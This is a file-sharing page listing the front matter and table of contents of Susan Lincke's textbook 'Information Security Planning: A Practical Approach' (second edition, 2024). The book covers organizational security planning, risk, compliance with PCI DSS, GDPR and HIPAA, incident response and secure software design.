Information Security Planning: A Practical Approach 3031431170, 9783031431173

This book demonstrates how information security requires a deep understanding of an organization's assets, threats

138 58 13MB

English Pages 466 [446] Year 2024

Report DMCA / Copyright

DOWNLOAD PDF FILE

Table of contents :
Preface: How to Use This Book
For the Educator
Addressing Educational Criteria
Teaching Aides for the Security Instructor
Disclaimer
Acknowledgments
Contents
Part I: The Problem of Security
Chapter 1: Security Awareness: Brave New World
1.1 With Security, Every Person Counts
1.2 Attackers and Motives
1.2.1 Cybercrime
1.2.2 Espionage
1.2.3 Information Warfare
1.3 Criminal Techniques to Enter, Investigate, and Persist in a Network
1.4 Protecting Yourself
1.5 Questions
References
Chapter 2: Combatting Fraud
2.1 Internal Fraud
2.1.1 Defenses Against Internal Fraud
2.1.2 Recognizing Fraud
2.2 External Fraud
2.2.1 Identity Theft
2.2.2 Social Engineering
2.2.3 Business Email Compromise
2.2.4 Consumer Fraud
2.2.5 Receipt, Check, and Money Order Scams
2.2.6 Developing an Action Plan
2.3 Advanced: A Fraud Investigation
2.4 Questions and Problems
2.4.1 Health First Case Study Problems
References
Chapter 3: Complying with the PCI DSS Standard
3.1 Applicability
3.2 Background and Threats
3.3 General Requirements
3.3.1 Definitions
3.3.1.1 Payment Card Information
3.3.1.2 Payment Card Configuration
3.3.2 PCI DSS Requirements
3.3.2.1 Build and Maintain a Secure Network
3.3.2.2 Protect Cardholder Data
3.3.2.3 Maintain a Vulnerability Management Program
3.3.2.4 Implement Strong Access Control Measures
3.3.2.5 Regularly Monitor and Test Networks
3.3.2.6 Maintain an Information Security Policy
3.3.3 Additional Requirements for Sophisticated Configurations
3.3.4 The PCI DSS Approval Process and Annual Assessments
3.3.5 Other Security Concerns
3.4 Specific Vendor Requirements
3.5 Advanced: Software Security Framework
3.6 Questions and Problems
References
Part II: Strategic Security Planning
Chapter 4: Managing Risk
4.1 Risk Management Overview
4.1.1 Step 1: Identify Risks
4.1.2 Step 2: Determine Loss Due to Threats
4.1.3 Step 3: Estimate Likelihood of Exploitation
4.1.4 Step 4: Compute Expected Loss
4.1.5 Step 5: Treat Risk
4.1.6 Step 6: Monitor (and Communicate) Risk
4.2 The Ethics of Risk
4.3 Advanced: Financial Analysis with Business Risk
4.4 Advanced: Risk for Larger Organizations
4.5 Questions and Problems
4.5.1 Health First Case Study Problems
References
Chapter 5: Addressing Business Impact Analysis and Business Continuity
5.1 Business Impact Analysis
5.1.1 Step 1: Define Threats Resulting in Business Disruption
5.1.2 Step 2: Define Recovery Objectives
5.2 Step 3: Business Continuity: Plan for Recovery
5.2.1 Recovery Sites
5.2.2 High-Availability Solutions
5.2.3 Disk Backup and Recovery
5.3 Step 4: Preparing for IT Disaster Recovery
5.4 Advanced: Business Continuity for Mature Organizations
5.5 Advanced: Considering Big Data Distributed File Systems
5.6 Questions
5.6.1 Health First Case Study Problems
References
Chapter 6: Governing: Policy, Maturity Models and Planning
6.1 Documenting Security: Policies, Standards, Procedures and Guidelines
6.2 Maturing the Organization via Capability Maturity Models and COBIT
6.3 Strategic, Tactical and Operational Planning
6.4 Allocating Security Roles and Responsibilities
6.5 Questions
6.5.1 Health First Case Study Problems
References
Part III: Tactical Security Planning
1.1 Important Tactical Concepts
Chapter 7: Designing Information Security
7.1 Important Concepts and Roles
7.2 Step 1: Classify Data for CIA
7.3 Step 2: Selecting Controls
7.3.1 Selecting AAA Controls
7.3.2 Authentication: Login or Identification
7.3.2.1 Biometric Systems
7.3.3 Authorization: Access Control
7.3.4 Accountability: Logs
7.3.5 Audit
7.4 Step 3: Allocating Roles and Permissions
7.5 Advanced: Administration of Information Security
7.6 Advanced: Designing Highly Secure Environments
7.6.1 Bell and La Padula Model (BLP)
7.7 Questions
7.7.1 Health First Case Study Problems
References
Chapter 8: Planning for Network Security
8.1 Important Concepts
8.1.1 How Crackers Attack
8.1.2 Filtering Packets to Restrict Network Access
8.2 Defining the Network Services
8.2.1 Step 1: Inventory Services and Devices: Who, What, Where?
8.2.1.1 Inventorying Devices
8.2.2 Step 2: Determine Sensitivity of Services
8.2.3 Step 3: Allocate Network Zones
8.2.4 Step 4: Define Controls
8.3 Defining Controls
8.3.1 Confidentiality Controls
8.3.2 Authenticity & Non-Repudiation
8.3.3 Integrity Controls
8.3.4 Anti-Hacker Controls
8.4 Defining the Network Architecture
8.4.1 Step 5: Draw the Network Diagram
8.5 Advanced: How it Works
8.6 Questions
8.6.1 Health First Case Study Problems
References
Chapter 9: Designing Physical Security
9.1 Step 1: Inventory Assets and Allocate Sensitivity/Criticality Class to Rooms
9.2 Step 2: Selecting Controls for Sensitivity Classifications
9.2.1 Building Entry Controls
9.2.2 Room Entry Controls
9.2.3 Computer and Document Access Control
9.2.4 The Public Uses Computers
9.3 Step 3: Selecting Availability Controls for Criticality Classifications
9.4 Questions and Problems
9.4.1 Health First Case Study Problems
References
Chapter 10: Attending to Information Privacy
10.1 Important Concepts and Principles
10.2 Step 1: Defining a Data Dictionary with Primary Purpose
10.3 Step 2: Performing a Privacy Impact Assessment
10.3.1 Defining Controls
10.3.2 Anonymizing Data
10.4 Step 3: Developing a Policy and Notice of Privacy Practices
10.5 Advanced: Big Data: Data Warehouses
10.6 Questions
References
Chapter 11: Planning for Alternative Networks: Cloud Security and Zero Trust
11.1 Important Concepts
11.1.1 Cloud Deployment Models
11.2 Planning a Secure Cloud Design
11.3 Step 1: Define Security and Compliance Requirements
11.4 Step 2: Select a Cloud Provider and Service/Deployment Model
11.5 Step 3: Define the Architecture
11.6 Step 4–6: Assess and Implement Security Controls in the Cloud
11.7 Step 7: Monitor and Manage Changes in the Cloud
11.8 Advanced: Software Development with Dev-Sec-Ops
11.9 Advanced: Using Blockchain
11.10 Advanced: Zero Trust
11.10.1 Important Concepts
11.10.2 Zero Trust Architecture
11.11 Zero Trust Planning
11.11.1 Network and Cloud Checklist for Zero Trust
11.12 Questions
References
Chapter 12: Organizing Personnel Security
12.1 Step 1: Controlling Employee Threats
12.2 Step 2: Allocating Responsibility to Roles
12.3 Step 3: Define Training for Security
12.4 Step 4: Designing Tools to Manage Security
12.4.1 Code of Conduct and Acceptable Use Policy
12.4.2 Configuration Management and Change Control
12.4.3 Service Level Agreements
12.5 Questions and Problems
12.5.1 Health First Case Study Problems
References
Part IV: Planning for Detect, Respond, Recover
Chapter 13: Planning for Incident Response
13.1 Important Statistics and Concepts
13.2 Developing an Incident Response Plan
13.2.1 Step 1: Preparation Stage
13.2.1.1 Bringing in the Law
13.2.2 Step 2: Identification Stage
13.2.3 Step 3: Containment and Escalation Stage
13.2.4 Step 4: Analysis and Eradication Stage
13.2.5 Step 5: Notification and Ex-post Response Stages (If Necessary)
13.2.6 Step 6: Recovery and Lessons Learned Stages
13.3 Preparing for Incident Response
13.4 Questions and Problems
13.4.1 Health First Case Study Problems
References
Chapter 14: Defining Security Metrics
14.1 Implementing Business-Driven Metrics
14.2 Implementing Technology-Driven Metrics
14.3 Questions and Problems
14.3.1 Health First Case Study Problems
References
Chapter 15: Performing an Audit or Security Test
15.1 Testing Internally and Simple Audits
15.1.1 Step 1: Gathering Information, Planning the Audit
15.1.2 Step 2: Reviewing Internal Controls
15.1.3 Step 3: Performing Compliance and Substantive Tests
15.1.4 Step 4: Preparing and Presenting the Report
15.2 Example: PCI DSS Audits and Report on Compliance
15.3 Professional and External Auditing
15.3.1 Audit Resources
15.3.2 Sampling
15.3.3 Evidence and Conclusions
15.3.4 Variations in Audit Types
15.4 Questions and Problems
15.4.1 Health First Case Study Problems
References
Chapter 16: Preparing for Forensic Analysis
16.1 Important Concepts
16.2 High-Level Forensic Analysis: Investigating an Incident
16.2.1 Establishing Forensic Questions
16.2.2 Collecting Important Information
16.3 Technical Perspective: Methods to Collect Evidence
16.3.1 Collecting Volatile Information Using a Jump Kit
16.3.2 Collecting and Analyzing Important Logs
16.3.3 Collecting and Forensically Analyzing a Disk Image
16.4 Legal Perspective: Establishing Chain of Custody
16.5 Advanced: The Judicial Procedure
16.6 Questions and Problems
References
Part V: Complying with National Regulations and Ethics
References
Chapter 17: Complying with the European Union General Data Protection Regulation (GDPR)
17.1 Background
17.2 Applicability
17.3 General Requirements
17.4 Rights Afforded to Data Subjects
17.4.1 Right of Access by the Data Subject (Article 15)
17.4.2 Right to Rectification (Article 16)
17.4.3 Right to Erasure (‘Right to Be Forgotten’) (Article 17)
17.4.4 Right to Restriction of Processing (Article 18)
17.4.5 Right to Data Portability (Article 20)
17.4.6 Right to Object to Processing (Article 21)
17.4.7 Right to Not Be Subject to a Decision Based Solely on Automated Processing (Article 22)
17.4.8 Rights of Remedies, Liabilities and Penalties (Articles 77–79)
17.4.9 Privilege of Notification (Article 13, 14)
17.4.10 Privilege of Communicated Response (Article 12)
17.4.11 Privilege of Protection of Special Groups (Article 9, 10)
17.5 Restrictions to Rights (Article 23)
17.6 Controller Processing Requirements
17.6.1 Risk Management and Security
17.6.2 Breach Notification
17.6.3 Penalties
17.6.4 Certification and Adequacy Decisions
17.6.5 Management and Third-Party Relationships
17.7 Actual GDPR Cases
17.8 Questions and Problems
References
Chapter 18: Complying with U.S. Security Regulations
18.1 Security Laws Affecting U.S. Organizations
18.1.1 State Breach Notification Laws
18.1.2 HIPAA/HITECH Act, 1996, 2009
18.1.3 Sarbanes-Oxley Act (SOX), 2002
18.1.4 Gramm–Leach–Bliley Act (GLB), 1999
18.1.5 Identity Theft Red Flags Rule, 2007
18.1.6 Family Educational Rights and Privacy Act (FERPA), 1974, and Other Child Protection Laws
18.1.6.1 Children’s Online Privacy Protection Act (COPPA), 1998
18.1.6.2 Children’s Internet Protection Act (CIPA), 2000
18.1.7 Federal Information Security Management Act (FISMA), 2002
18.1.8 California Consumer Privacy Act (CCPA)
18.2 Computer Abuse Laws
18.3 Other Laws
18.4 Final Considerations
18.5 Advanced: Understanding the Context of Law
18.6 Questions and Problems
References
Chapter 19: Complying with HIPAA and HITECH
19.1 Background
19.2 Introduction and Vocabulary
19.3 HITECH Breach Notification
19.4 HIPAA Privacy Rule
19.4.1 Patient Privacy and Rights
19.4.1.1 Disclosures
19.4.1.2 De-identification and Limited Data Sets
19.5 HIPAA Security Rule
19.5.1 Administrative Requirements
19.5.2 Physical Security
19.5.3 Technical Controls
19.6 Recent and Proposed Changes in Regulation
19.7 Questions and Problems
19.7.1 Health First Case Study Problems
References
Chapter 20: Maturing Ethical Risk
20.1 Important Concepts
20.2 Raising Ethical Maturity through an Ethical Risk Framework
20.2.1 Raising Self-centered Ethical Concern
20.2.1.1 Open Communication
20.2.1.2 Develop a Code of Ethics
20.2.1.3 Provide an Anonymous Reporting Mechanism for Ethical Violations
20.2.2 Adhering to Regulation
20.2.2.1 Address Regulation Fully
20.2.2.2 Evaluate Legal Responsibility Beyond Regulation
20.2.2.3 Manage Projects Responsibly
20.2.3 Respecting Stakeholder Concerns
20.2.3.1 Personalize Risk
20.2.3.2 Evaluate Trade-offs of Concern
20.2.4 Addressing Societal Concerns
20.2.4.1 Think Outside the Engineer Role
20.2.4.2 Inform of Safety and Security Concerns to Customers
20.2.4.3 Evaluate Unknown Risk
20.3 Questions
References
Part VI: Developing Secure Software
Chapter 21: Understanding Software Threats and Vulnerabilities
21.1 Important Concepts and Goals
21.2 Threats to Input
21.2.1 Recognize Injection Attacks
21.2.2 Control Cross-site scripting (XSS)
21.2.3 Authentication and Access Control
21.2.4 Recognize Cross-Site Request Forgery (CSRF)
21.2.5 Minimize Access
21.3 Implement Security Features
21.4 Testing Issues
21.5 Deployment Issues
21.5.1 Validate and Control the Configuration
21.5.2 Questions and Problems
References
Chapter 22: Defining a Secure Software Process
22.1 Important Concepts
22.1.1 Software Security Maturity Models
22.1.2 The Secure Software Group
22.2 Secure Development Life Cycle
22.2.1 Coding
22.2.2 Testing
22.2.3 Deployment, Operations, Maintenance and Disposal
22.3 Secure Agile Development
22.3.1 Designing Agile Style: Evil User Stories
22.4 Example Secure Process: PCI Software Security Framework
22.5 Security Industry Standard: Common Criteria
22.6 Questions and Problems
22.6.1 Health First Case Study Problems
References
Chapter 23: Planning for Secure Software Requirements and Design with UML
23.1 Important Concepts and Principles in Secure Software Design
23.2 Evaluating Security Requirements
23.2.1 Step 1: Identify Critical Assets
23.2.2 Step 2: Define Security Goals
23.2.3 Step 3: Identify Threats
23.2.4 Step 4: Analyze Risks
23.2.5 Step 5: Define Security Requirements
23.2.6 Specify Reliability, Robustness
23.3 Analysis/Design
23.3.1 Static Model
23.3.2 Dynamic Model
23.3.2.1 Sequence Diagrams
23.3.2.2 State Transition Diagrams
23.4 Example Secure Design: PCI Software Security Framework
23.5 Questions and Problems
23.5.1 Health First Case Study Problems
References
Recommend Papers

Information Security Planning: A Practical Approach
 3031431170, 9783031431173

  • 0 0 0
  • Like this paper and download? You can publish your own PDF file online for free in a few minutes! Sign Up
File loading please wait...
Citation preview

Susan Lincke

Information Security Planning A Practical Approach Second Edition

Information Security Planning

Susan Lincke

Information Security Planning A Practical Approach Second Edition

Susan Lincke University of Wisconsin-Parkside Kenosha, WI, USA

ISBN 978-3-031-43117-3    ISBN 978-3-031-43118-0 (eBook) https://doi.org/10.1007/978-3-031-43118-0 © The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature Switzerland AG 2015, 2024 This work is subject to copyright. All rights are solely and exclusively licensed by the Publisher, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and transmission or information storage and retrieval, electronic adaptation, computer software, or by similar or dissimilar methodology now known or hereafter developed. The use of general descriptive names, registered names, trademarks, service marks, etc. in this publication does not imply, even in the absence of a specific statement, that such names are exempt from the relevant protective laws and regulations and therefore free for general use. The publisher, the authors, and the editors are safe to assume that the advice and information in this book are believed to be true and accurate at the date of publication. Neither the publisher nor the authors or the editors give a warranty, expressed or implied, with respect to the material contained herein or for any errors or omissions that may have been made. The publisher remains neutral with regard to jurisdictional claims in published maps and institutional affiliations. This Springer imprint is published by the registered company Springer Nature Switzerland AG The registered company address is: Gewerbestrasse 11, 6330 Cham, Switzerland Paper in this product is recyclable.

Preface: How to Use This Book

This book is useful in organizational security planning. This text was written for people who are not computer experts, including business managers or owners with no previous IT background, or overworked IT staff and students, who are looking for a shortcut in understanding and designing security. The text has examples to help you understand each required step within the workbook. The best design will eventually involve both business and IT/security people. This second edition of the book is an international edition, covering the worldwide standard: Payment Card Industry Data Security Standard (PCI DSS), the European GDPR, and American security laws with a special chapter on HIPAA/ HITECH. This edition also has chapters on data privacy, forensic analysis, advanced networks (cloud and zero trust), ethics, and an expanded section on secure software. The associated Security Workbook has been designed to guide security neophytes through the security planning process. You may edit this Microsoft Word version of the Security Workbook for your own organization’s use. This tool is available from your text download site or the book’s web site at https://sn.pub/ lecturer-material. This book can be used out of order, although it is recommended that you read Part I to understand security threats, before proceeding to later parts. Applicable chapters in Part V on regulation (European GDPR and US diverse laws) is also a good way to understand the security challenges and prioritize your required planning. Following an understanding of the threats, PCI DSS requirements and applicable regulation, Chap. 5 on Business Continuity and Chap. 7 on Information Security are very important before proceeding to Chap. 8 on Network Security and later. While you may execute the chapters out of order, each applicable chapter is important in making your organization attack-resistant. Optional topics may be applicable to your organization. Part VI—Developing Secure Software—is only applicable for software engineers. Since this is an international edition, laws for nations outside your home country may or may not be applicable, depending on where you do business. The forensic analysis, information privacy, cloud/zero trust, and governance topics may be applicable depending on

v

vi

Preface: How to Use This Book

your organizational role and technical abilities, and your company’s regulation and network configuration. Advanced sections within some chapters are optional reading and not absolutely necessary to develop initial security plans. They offer a broader knowledge base to understand the security environment and address relevant background topics that every security professional should know. It is important to recognize that even large well-funded organizations with full-­ time professional security staff cannot fully secure their networks and computers. The best they can do is to make the organization a very difficult target. The problem with security is that the attacker needs to find one hole, while the defender needs to close all holes—an impossibility. However, with this text you are well on your way to making your organization attack-resistant. This book guides security planning for a simple-to-medium level security installation. After your design is done, you must implement your plan! While you can do much security planning without IT/security expertise, eventually IT experts are needed to implement the technical aspects of any plan. It will be useful at that time to discuss your security design with your IT specialists, be they in-house or external. Alternatively, if you are technical, you will need cooperation from business management to understand where sensitive data lies and regulatory concerns, in order to plan organizational security well. For organizations requiring a high level of security, such as banks and military, this text is a start but is insufficient by itself. This book is a stepping stone also for organizations that must adhere to a high level of security regulation and standards. The best implementation can start with this book, but must also address each item of each regulation or standard your organization must adhere to.

For the Educator This book has aspects for course differentiation, to be useful to the professional, technical, business, and potentially medical educational communities; and also from lower level to introductory graduate courses. For the security professional or service-learning educator, some chapters can be read and performed out of order (or in order of reader priority). The prerequisite understanding is always described at the beginning of each section and the beginning of each chapter. Each chapter ends with a small set of questions and one or more case study exercises. The questions are meant for simpler levels of sophistication, such as a review of vocabulary, web research into more resources, and application of the workbook for varying industries and security regulations. The more sophisticated course can delve into a longitudinal case study, either in an industry of the student groups’ choosing or on the Health First Doctor’s Office,

Preface: How to Use This Book

vii

which must adhere to HIPAA or GDPR.  These case studies use the Security Workbook for organizational security planning. The case study can be used as group homework or active learning exercise in class. Alternatively, students can use the Security Workbook for service learning purposes, working with real organizational partners in the community. For technically minded instructors and students, there is a section on Secure Software, covering threats, secure development processes, and secure designs using agile (evil user stories) or traditional (UML) styles. A special set of case studies are available just for software developers to use in combination with a Security Requirements Document for secure software planning.

Addressing Educational Criteria For American universities wishing to achieve a National Security Agency (NSA) designation, this book attempts to address the Center of Academic Excellence Cyber Defense (CAE-CD) plan for 2020, including some Mandatory and Optional Knowledge Units (KU). While the book has not been submitted or approved by the NSA, the author has attempted to address each item in their list, to simplify the accreditation process. The book attempts to cover the entirety of the CAE-CD Nontechnical Core requirements. Often ‘Advanced’ sections cover more sophisticated topics beyond security planning. Very technical subjects (e.g., programming, networks, operating systems) are meant to be covered in other courses. CAE-CD Knowledge Units addressed include: • Foundational: Cybersecurity Principles • Technical Core: Network Defense • Nontechnical Core: Cyber Threats, Cybersecurity Planning and Management, Policy, Legal, Ethics, and Compliance, Security Program Management, Security Risk Analysis • Optional KUs: Basic Cyber Operations, Cyber Crime, Cybersecurity Ethics, Fraud Prevention and Management, IA Compliance, Life-Cycle Security, Privacy • Optional KUs at Introductory Level: Cloud Computing, Digital Forensics, Software Assurance, Secure Programming Practices The last category, Optional KUs at Introductory Level, introduces the vast majority of topics in the KU but generally lacks one or more deeply technical exercises that are required as outcomes. The text also meets most 2013 ACM Information Assurance and Security “Core” requirements for Computer Science, including Foundational Concepts, Principles of Secure Design, Defensive Programming, Threats and Attacks, and some of  Network Security. Addressed electives include Security Policy, Secure S/W Engineering, and most of Web Security. The mapping of requirements to chapters is outlined on the companion web site.

viii

Preface: How to Use This Book

Finally, the base of this text is derived from ISACA’s Certified Information Systems Auditor® (CISA) and Certified Information Security Manager® (CISM) study guides related to security. Other parts of these guides are generally covered by other courses, such as project management, networking, and software engineering. Students may pass these exams with additional study, particularly using ISACA’s CISA or CISM question disks.

Teaching Aides for the Security Instructor

Many materials are available with this text for your teaching use. Instructor/student materials are included on the companion web site, at https://sn.pub/lecturermaterial. Extra materials include the following: 1. Lecture PowerPoints: PowerPoint lectures include end-of-lecture questions for discussion in class. These questions are patterned after ISACA’s CISA and CISM questions. 2. Security Workbook: The security workbook guides student teams through a design. There are two ways for student teams to develop a security plan. Option 1: designs a hypothetical organization of student teams’ choosing, e.g., in retail, hospitality, government, healthcare, financial, or software services. This has the advantage that students can contrast security plans for different types of businesses in the same course, through student presentations. Option 2: The Health First Case Study is a detailed case study. This has the advantage that details are available for the business. 3. Health First Case Study, Security Workbook, and Solution: A case study involving security planning for a hypothetical Health First doctor’s office is available for classroom use. Each chapter on security design in this text has at least one associated case study to choose from, within the Health First Case Study. This case study includes discussion by the Health First employees, discussing the business scenario. The Security Workbook guides students through the security process. A solution is available on the companion web site for instructors. If you choose to do the case study, it is helpful to understand/present the applicable American Health Insurance Portability and Accountability Act (HIPAA) regulation or European GDPR before starting the case study. 4. Health First Requirements Document Case Study: The Secure Software chapter enthuses students who intend to be software or web developers. The Health First Case Study includes cases where students add security to a professional Requirements Document. A security-poor Requirements Document is available for download.

ix

x

Teaching Aides for the Security Instructor

5. Instructor Guide: There is guide to how to use this case study in your classroom. You may also use the Security Workbook as a service learning exercise with small businesses, who often welcome the free help, if you choose.

Disclaimer The author and publisher do not warrant or guarantee that the techniques contained in these works will meet your requirements. The author is not liable for any inaccuracy, error, or omission, regardless of cause, in the work or for any damages resulting there from. Under no circumstances shall the author be liable for any direct, indirect, incidental, special, punitive, consequential, or similar damages that result from the use of, or inability to use, these works. Kenosha, WI, USA

Susan Lincke

Acknowledgments

Many thanks go to people who used or reviewed the materials, or assisted in the development of the case study for the first and/or second edition. They include Matt McPherson, Viji Ramasamy, Tony Aiello, Danny Hetzel, Stephen Hawk, David Green, Heather Miles, Joseph Baum, Mary Comstock, Craig Baker, Todd Burri, Tim Dorr, Tim Knautz, Brian Genz, LeRoy Foster, Misty Lowery, and Natasha Ravnikar, as well as the University of Wisconsin-Parkside for funding my sabbatical for the first edition. Thanks also to the National Science Foundation, who funded the development of the workbook and case study (though this work does not necessarily represent their views). Finally, thanks to the organizations and people who worked with my students in service learning projects and who must remain anonymous. The case of Einstein University represented in this text is purely fictional and does not represent the security plan of any actual university. Kenosha, WI, USA

Susan Lincke

xi

Contents

Part I The Problem of Security 1

Security Awareness: Brave New World��������������������������������������������������    3 1.1 With Security, Every Person Counts������������������������������������������������    3 1.2 Attackers and Motives����������������������������������������������������������������������    4 1.2.1 Cybercrime����������������������������������������������������������������������������    4 1.2.2 Espionage������������������������������������������������������������������������������    5 1.2.3 Information Warfare��������������������������������������������������������������    7 1.3 Criminal Techniques to Enter, Investigate, and Persist in a Network��������������������������������������������������������������������������������������    9 1.4 Protecting Yourself����������������������������������������������������������������������������   12 1.5 Questions������������������������������������������������������������������������������������������   17 References��������������������������������������������������������������������������������������������������   19

2

Combatting Fraud ����������������������������������������������������������������������������������   21 2.1 Internal Fraud������������������������������������������������������������������������������������   22 2.1.1 Defenses Against Internal Fraud������������������������������������������   23 2.1.2 Recognizing Fraud����������������������������������������������������������������   29 2.2 External Fraud����������������������������������������������������������������������������������   30 2.2.1 Identity Theft������������������������������������������������������������������������   30 2.2.2 Social Engineering����������������������������������������������������������������   32 2.2.3 Business Email Compromise������������������������������������������������   35 2.2.4 Consumer Fraud��������������������������������������������������������������������   35 2.2.5 Receipt, Check, and Money Order Scams����������������������������   36 2.2.6 Developing an Action Plan ��������������������������������������������������   37 2.3 Advanced: A Fraud Investigation������������������������������������������������������   38 2.4 Questions and Problems��������������������������������������������������������������������   40 2.4.1 Health First Case Study Problems����������������������������������������   41 References��������������������������������������������������������������������������������������������������   42

xiii

xiv

3

Contents

 Complying with the PCI DSS Standard������������������������������������������������   45 3.1 Applicability ������������������������������������������������������������������������������������   45 3.2 Background and Threats ������������������������������������������������������������������   46 3.3 General Requirements����������������������������������������������������������������������   47 3.3.1 Definitions����������������������������������������������������������������������������   48 3.3.2 PCI DSS Requirements��������������������������������������������������������   49 3.3.3 Additional Requirements for Sophisticated Configurations����������������������������������������������������������������������   57 3.3.4 The PCI DSS Approval Process and Annual Assessments��������������������������������������������������������������������������   57 3.3.5 Other Security Concerns ������������������������������������������������������   58 3.4 Specific Vendor Requirements����������������������������������������������������������   59 3.5 Advanced: Software Security Framework����������������������������������������   61 3.6 Questions and Problems��������������������������������������������������������������������   61 References��������������������������������������������������������������������������������������������������   62

Part II Strategic Security Planning 4

Managing Risk ����������������������������������������������������������������������������������������   67 4.1 Risk Management Overview������������������������������������������������������������   68 4.1.1 Step 1: Identify Risks������������������������������������������������������������   69 4.1.2 Step 2: Determine Loss Due to Threats��������������������������������   74 4.1.3 Step 3: Estimate Likelihood of Exploitation������������������������   75 4.1.4 Step 4: Compute Expected Loss ������������������������������������������   77 4.1.5 Step 5: Treat Risk������������������������������������������������������������������   81 4.1.6 Step 6: Monitor (and Communicate) Risk����������������������������   82 4.2 The Ethics of Risk����������������������������������������������������������������������������   83 4.3 Advanced: Financial Analysis with Business Risk ��������������������������   84 4.4 Advanced: Risk for Larger Organizations����������������������������������������   86 4.5 Questions and Problems��������������������������������������������������������������������   87 4.5.1 Health First Case Study Problems����������������������������������������   88 References��������������������������������������������������������������������������������������������������   88

5

 Addressing Business Impact Analysis and Business Continuity����������   91 5.1 Business Impact Analysis ����������������������������������������������������������������   91 5.1.1 Step 1: Define Threats Resulting in Business Disruption ����������������������������������������������������������������������������   92 5.1.2 Step 2: Define Recovery Objectives ������������������������������������   94 5.2 Step 3: Business Continuity: Plan for Recovery������������������������������   96 5.2.1 Recovery Sites����������������������������������������������������������������������   97 5.2.2 High-Availability Solutions��������������������������������������������������   97 5.2.3 Disk Backup and Recovery��������������������������������������������������  100 5.3 Step 4: Preparing for IT Disaster Recovery��������������������������������������  101 5.4 Advanced: Business Continuity for Mature Organizations��������������  104 5.5 Advanced: Considering Big Data Distributed File Systems ������������  106

Contents

xv

5.6 Questions������������������������������������������������������������������������������������������  107 5.6.1 Health First Case Study Problems����������������������������������������  108 References��������������������������������������������������������������������������������������������������  108 6

 Governing: Policy, Maturity Models and Planning������������������������������  111 6.1 Documenting Security: Policies, Standards, Procedures and Guidelines����������������������������������������������������������������������������������  111 6.2 Maturing the Organization via Capability Maturity Models and COBIT����������������������������������������������������������������������������������������  113 6.3 Strategic, Tactical and Operational Planning������������������������������������  116 6.4 Allocating Security Roles and Responsibilities��������������������������������  118 6.5 Questions������������������������������������������������������������������������������������������  120 6.5.1 Health First Case Study Problems����������������������������������������  120 References��������������������������������������������������������������������������������������������������  121

Part III Tactical Security Planning 7

Designing Information Security��������������������������������������������������������������  127 7.1 Important Concepts and Roles����������������������������������������������������������  127 7.2 Step 1: Classify Data for CIA ����������������������������������������������������������  129 7.3 Step 2: Selecting Controls����������������������������������������������������������������  131 7.3.1 Selecting AAA Controls ������������������������������������������������������  133 7.3.2 Authentication: Login or Identification��������������������������������  134 7.3.3 Authorization: Access Control����������������������������������������������  135 7.3.4 Accountability: Logs������������������������������������������������������������  137 7.3.5 Audit ������������������������������������������������������������������������������������  138 7.4 Step 3: Allocating Roles and Permissions����������������������������������������  138 7.5 Advanced: Administration of Information Security�������������������������  139 7.6 Advanced: Designing Highly Secure Environments������������������������  140 7.6.1 Bell and La Padula Model (BLP)������������������������������������������  141 7.7 Questions������������������������������������������������������������������������������������������  143 7.7.1 Health First Case Study Problems����������������������������������������  144 References��������������������������������������������������������������������������������������������������  144

8

 Planning for Network Security ��������������������������������������������������������������  147 8.1 Important Concepts��������������������������������������������������������������������������  147 8.1.1 How Crackers Attack������������������������������������������������������������  148 8.1.2 Filtering Packets to Restrict Network Access ����������������������  149 8.2 Defining the Network Services ��������������������������������������������������������  150 8.2.1 Step 1: Inventory Services and Devices: Who, What, Where?��������������������������������������������������������������  150 8.2.2 Step 2: Determine Sensitivity of Services����������������������������  152 8.2.3 Step 3: Allocate Network Zones ������������������������������������������  153 8.2.4 Step 4: Define Controls��������������������������������������������������������  155 8.3 Defining Controls������������������������������������������������������������������������������  155 8.3.1 Confidentiality Controls��������������������������������������������������������  156

xvi

Contents

8.3.2 Authenticity & Non-Repudiation������������������������������������������  159 8.3.3 Integrity Controls������������������������������������������������������������������  160 8.3.4 Anti-Hacker Controls������������������������������������������������������������  161 8.4 Defining the Network Architecture��������������������������������������������������  165 8.4.1 Step 5: Draw the Network Diagram��������������������������������������  167 8.5 Advanced: How it Works������������������������������������������������������������������  167 8.6 Questions������������������������������������������������������������������������������������������  169 8.6.1 Health First Case Study Problems����������������������������������������  171 References��������������������������������������������������������������������������������������������������  171 9

Designing Physical Security��������������������������������������������������������������������  173 9.1 Step 1: Inventory Assets and Allocate Sensitivity/Criticality Class to Rooms ��������������������������������������������������������������������������������  174 9.2 Step 2: Selecting Controls for Sensitivity Classifications����������������  175 9.2.1 Building Entry Controls��������������������������������������������������������  176 9.2.2 Room Entry Controls������������������������������������������������������������  177 9.2.3 Computer and Document Access Control����������������������������  177 9.2.4 The Public Uses Computers��������������������������������������������������  179 9.3 Step 3: Selecting Availability Controls for Criticality Classifications ����������������������������������������������������������������������������������  180 9.4 Questions and Problems��������������������������������������������������������������������  182 9.4.1 Health First Case Study Problems����������������������������������������  183 References��������������������������������������������������������������������������������������������������  184

10 Attending  to Information Privacy����������������������������������������������������������  185 10.1 Important Concepts and Principles ������������������������������������������������  186 10.2 Step 1: Defining a Data Dictionary with Primary Purpose ������������  188 10.3 Step 2: Performing a Privacy Impact Assessment��������������������������  190 10.3.1 Defining Controls��������������������������������������������������������������  193 10.3.2 Anonymizing Data������������������������������������������������������������  194 10.4 Step 3: Developing a Policy and Notice of Privacy Practices��������  195 10.5 Advanced: Big Data: Data Warehouses������������������������������������������  196 10.6 Questions����������������������������������������������������������������������������������������  198 References��������������������������������������������������������������������������������������������������  199 11 Planning  for Alternative Networks: Cloud Security and Zero Trust������������������������������������������������������������������������������������������  201 11.1 Important Concepts������������������������������������������������������������������������  201 11.1.1 Cloud Deployment Models ����������������������������������������������  202 11.2 Planning a Secure Cloud Design����������������������������������������������������  205 11.3 Step 1: Define Security and Compliance Requirements ����������������  205 11.4 Step 2: Select a Cloud Provider and Service/Deployment Model����������������������������������������������������������������������������������������������  207 11.5 Step 3: Define the Architecture ������������������������������������������������������  209 11.6 Step 4–6: Assess and Implement Security Controls in the Cloud������������������������������������������������������������������������������������  209

Contents

xvii

